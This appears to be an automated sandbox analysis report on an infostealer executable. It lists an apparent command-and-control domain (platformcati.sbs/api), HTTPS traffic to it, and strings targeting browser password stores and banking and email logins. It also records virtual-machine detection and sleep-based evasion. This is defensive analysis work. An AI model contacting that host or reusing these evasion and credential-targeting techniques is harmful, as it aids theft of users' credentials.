                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.000000000122D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/#HX
                Source: h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/S
                Source: h226x41CQ6.exe, 00000004.00000003.1559487979.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1595467129.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1588501158.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528754817.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1618718716.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1633234944.0000000003B40000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1584407261.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632344310.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1584530133.00000000012AB000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/api
                Source: h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/api(w
                Source: h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/api?
                Source: h226x41CQ6.exe, 00000004.00000003.1528593534.0000000003B50000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1528704318.0000000003B50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/apieI
                Source: h226x41CQ6.exe, 00000004.00000003.1595467129.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000002.1632554277.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1618718716.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/apip
                Source: h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001247000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/apiz
                Source: h226x41CQ6.exe, 00000004.00000003.1557986513.00000000012BC000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1543311993.00000000012BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/api~
                Source: h226x41CQ6.exe, 00000004.00000003.1293612240.00000000012BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platformcati.sbs/h
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&r
                Source: h226x41CQ6.exe, 00000004.00000003.1276217252.0000000001227000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276129508.00000000012A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
                Source: h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276129508.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1279584582.0000000001266000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: h226x41CQ6.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: h226x41CQ6.exe, 00000004.00000003.1295458384.0000000003B8B000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B88000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295967386.0000000003B88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: h226x41CQ6.exe, 00000004.00000003.1559711791.0000000003B4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: h226x41CQ6.exe, 00000004.00000003.1544250040.0000000003E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49838 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49849 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49860 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49871 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49892 version: TLS 1.2
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260
                Source: h226x41CQ6.exeStatic PE information: invalid certificate
                Source: h226x41CQ6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: h226x41CQ6.exeStatic PE information: Section: .data ZLIB complexity 0.9944528978924418
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/5@2/1
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7260
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\0f0d0a88-6921-446b-ad7f-35074b523590Jump to behavior
                Source: h226x41CQ6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\h226x41CQ6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: h226x41CQ6.exe, 00000004.00000003.1294984513.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1295638393.0000000003B58000.00000004.00000800.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1529897506.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1529302604.0000000003B61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: h226x41CQ6.exeVirustotal: Detection: 79%
                Source: h226x41CQ6.exeReversingLabs: Detection: 86%
                Source: C:\Users\user\Desktop\h226x41CQ6.exeFile read: C:\Users\user\Desktop\h226x41CQ6.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\h226x41CQ6.exe "C:\Users\user\Desktop\h226x41CQ6.exe"
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess created: C:\Users\user\Desktop\h226x41CQ6.exe "C:\Users\user\Desktop\h226x41CQ6.exe"
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7260 -s 260
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess created: C:\Users\user\Desktop\h226x41CQ6.exe "C:\Users\user\Desktop\h226x41CQ6.exe"Jump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: h226x41CQ6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: h226x41CQ6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: h226x41CQ6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: h226x41CQ6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: h226x41CQ6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: h226x41CQ6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: h226x41CQ6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: h226x41CQ6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: h226x41CQ6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: h226x41CQ6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: h226x41CQ6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: h226x41CQ6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: h226x41CQ6.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: h226x41CQ6.exeStatic PE information: section name: .ball
                Source: h226x41CQ6.exeStatic PE information: section name: .ball
                Source: C:\Users\user\Desktop\h226x41CQ6.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\h226x41CQ6.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exe TID: 7452Thread sleep time: -210000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exe TID: 7624Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\h226x41CQ6.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: Amcache.hve.10.drBinary or memory string: VMware
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: h226x41CQ6.exe, 00000004.00000002.1632344310.0000000001253000.00000004.00000020.00020000.00000000.sdmp, h226x41CQ6.exe, 00000004.00000003.1276150562.0000000001253000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: Amcache.hve.10.drBinary or memory string: vmci.sys
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: Amcache.hve.10.drBinary or memory string: VMware20,1
                Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Amcache.hve.10.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
                Source: h226x41CQ6.exe, 00000004.00000003.1529448365.0000000003B8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
